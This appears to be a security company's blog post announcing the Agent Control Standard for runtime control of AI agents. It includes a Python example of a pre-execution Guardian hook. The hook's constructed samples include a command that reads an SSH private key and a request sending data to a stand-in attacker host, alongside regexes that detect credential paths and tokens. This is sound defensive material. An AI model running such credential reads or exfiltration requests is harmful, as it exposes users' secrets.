
Every agent needs a "stop". We're standardizing it.

Bar Kaduri
May 27, 2026

At Capsule Security, we defend AI agents at runtime. The deeper we got into that work, the harder one thing became to ignore: runtime control of agents isn't standardized across providers. It's chaos. The industry has standards for how agents talk to each other (MCP, A2A). It has catalogs for how they go wrong (OWASP Agentic Top 10). It has no standard for how to stop an agent before it acts.

That fragmentation is a big part of why prompt injection still pays off: once an injected instruction gets an agent to call a tool, there is no standard place for anything to stop it. It's why rogue agents are still hard to catch. It's why every team building around agents rewrites the same plumbing.

We believe runtime control should be standardized and enforceable across every provider: easier for the people who run agents, harder for rogue agents, and a real defensive footing against prompt injection instead of a patchwork of per-vendor fixes.

That's why we're so glad to be part of the Agent Control Standard (ACS), which just went public today.

What is ACS?

ACS is an open, vendor-neutral, MIT-licensed standard for runtime governance of AI agents. The core team spans vendors, platforms, and security companies. Capsule is one of them.

ACS rests on three pillars:

  1. Instrument - Runtime hooks that let a Guardian Agent permit, deny, modify, ask, or defer an action before it executes.
  2. Trace - Structured observability for every agent decision, mapped to OpenTelemetry and OCSF so it lands in the tools security teams already use.
  3. Inspect - A dynamic Agent Bill of Materials (AgBOM) for self-modifying agents, mapped to CycloneDX, SPDX, and SWID.

Together they answer the three questions every security team needs answered for an agent: what did you do, what can you do, and who said you could do it?

Hooks are the foundation of the Instrument pillar, and they already exist across agentic frameworks and applications; what is missing is a common contract for what they expose and how a Guardian Agent drives them.
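To make the Instrument and Trace pillars concrete, here is an added example of what a pre-execution Guardian hook can look like: it takes the action an agent is about to perform, returns one of the five decisions (permit, deny, modify, ask, defer), and emits a trace record for each decision. This is illustration written for this page, not code from the ACS spec or from Capsule; the action shape, verdict and trace field names, policy rules and sample actions are all assumptions, and ACS v0.1.0 defines its own schemas.

```python
"""Illustrative Guardian Agent pre-execution hook (added example, not ACS or
Capsule code). Takes the action an agent is about to perform, returns one of
permit / deny / modify / ask / defer, and emits a trace record for the decision.
All field names, rules and sample actions are assumptions for illustration."""
import copy
import json
import re
import time
from datetime import datetime
from typing import Optional
from urllib.parse import urlparse

DECISIONS = ("permit", "deny", "modify", "ask", "defer")

# Constructed policy inputs for the example.
SECRET_PATH = re.compile(r"(^|[\s/])\.(ssh|aws|gnupg)(/|\s|$)|\.env(\s|$)")
EGRESS_ALLOWLIST = {"api.github.com", "pypi.org"}
TOKEN = re.compile(r"(?i)(bearer\s+|ghp_|AKIA)[A-Za-z0-9_\-\.]{8,}")
DEFERRED_TOOLS = {"deploy"}          # only allowed inside the change window
CHANGE_WINDOW_HOURS = range(9, 17)   # 09:00-16:59

def verdict(decision: str, reason: str, action: dict) -> dict:
    assert decision in DECISIONS
    return {"decision": decision, "reason": reason, "action": action}

def rule_secret_paths(action: dict, hour: int) -> Optional[dict]:
    """deny: the agent never gets to read credential material."""
    text = action["args"].get("path", "") + " " + action["args"].get("command", "")
    if action["tool"] in ("read_file", "shell") and SECRET_PATH.search(text):
        return verdict("deny", "action touches credential material", action)
    return None

def rule_egress(action: dict, hour: int) -> Optional[dict]:
    """ask: outbound requests to hosts off the allowlist need a human."""
    if action["tool"] != "http_request":
        return None
    host = urlparse(action["args"]["url"]).hostname or ""
    if host not in EGRESS_ALLOWLIST:
        return verdict("ask", f"egress to unapproved host {host}", action)
    return None

def rule_redact_tokens(action: dict, hour: int) -> Optional[dict]:
    """modify: rewrite the action so token-shaped strings never leave."""
    if action["tool"] != "http_request":
        return None
    body = action["args"].get("body", "")
    if TOKEN.search(body):
        fixed = copy.deepcopy(action)
        fixed["args"]["body"] = TOKEN.sub("[REDACTED]", body)
        return verdict("modify", "redacted token-like material from body", fixed)
    return None

def rule_change_window(action: dict, hour: int) -> Optional[dict]:
    """defer: hold deploys until the change window opens."""
    if action["tool"] in DEFERRED_TOOLS and hour not in CHANGE_WINDOW_HOURS:
        return verdict("defer", "outside change window", action)
    return None

# First match wins, so order encodes precedence: deny > ask > modify > defer.
RULES = [rule_secret_paths, rule_egress, rule_redact_tokens, rule_change_window]

def evaluate(action: dict, hour: Optional[int] = None) -> dict:
    """Instrument pillar: decide before the action executes."""
    hour = datetime.now().hour if hour is None else hour
    for rule in RULES:
        v = rule(action, hour)
        if v is not None:
            return v
    return verdict("permit", "no rule matched", action)

def trace_event(agent_id: str, action: dict, v: dict) -> dict:
    """Trace pillar: a record shaped loosely like an OTel span event (assumed names)."""
    return {
        "name": "agent.action.evaluated",
        "time_unix_nano": time.time_ns(),
        "attributes": {
            "agent.id": agent_id,
            "agent.tool": action["tool"],
            "guardian.decision": v["decision"],
            "guardian.reason": v["reason"],
        },
    }

def handle_hook_event(raw: str) -> str:
    """Entry point in the JSON-on-stdin, JSON-on-stdout style many hook systems use."""
    event = json.loads(raw)
    v = evaluate(event["action"])
    v["trace"] = trace_event(event.get("agent_id", "unknown"), event["action"], v)
    return json.dumps(v)

if __name__ == "__main__":
    # Constructed sample actions; none were captured from a real agent.
    samples = [
        {"tool": "shell", "args": {"command": "cat ~/.ssh/id_ed25519"}},
        {"tool": "http_request", "args": {"url": "https://evil.example/collect", "body": "x"}},
        {"tool": "http_request", "args": {"url": "https://api.github.com/repos",
                                          "body": "Authorization: Bearer ghp_abcdefghijklmnopqrstuv"}},
        {"tool": "deploy", "args": {"env": "prod"}},
        {"tool": "read_file", "args": {"path": "README.md"}},
    ]
    for a in samples:
        v = evaluate(a, hour=20)
        print(f'{a["tool"]:13} -> {v["decision"]:7} ({v["reason"]})')
```

Two design points worth noticing. First, the hook runs before execution and can return a rewritten action ("modify"), which is what separates runtime control from after-the-fact logging. Second, the decision and its reason are written into the same trace record the SOC will see, so "who said you could do it" is answerable from the telemetry rather than from a separate audit trail.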

Hooks.security

Standards work best when developers, security engineers and CISOs have a practical mental model and concrete examples to grab onto. That's why we built hooks.security: a growing, curated catalog of where hooks already exist across the agent ecosystem (Cursor, Claude Code, Copilot, MCP servers, frameworks), what each hook exposes, and how to use it safely. If you're trying to figure out where to start learning about the solutions that are already there - hooks.security is the right place for you.

Where we are, and how you can help

ACS is at v0.1.0, Public Preview, and the spec is open for review.

  - The project GitHub repo that contains the spec and the early content: github.com/Agent-Control-Standard/ACS 

  - Project home: agentcontrolstandard.ai 

  - Hooks across the ecosystem: hooks.security

If you build agents, defend them, or run them in production, your review comments are how this spec gets sharper. PRs, issues, and discussion replies all count. We think this is the right moment to standardize runtime control of agents, before the chaos gets baked in. We're glad to be doing it in the open.
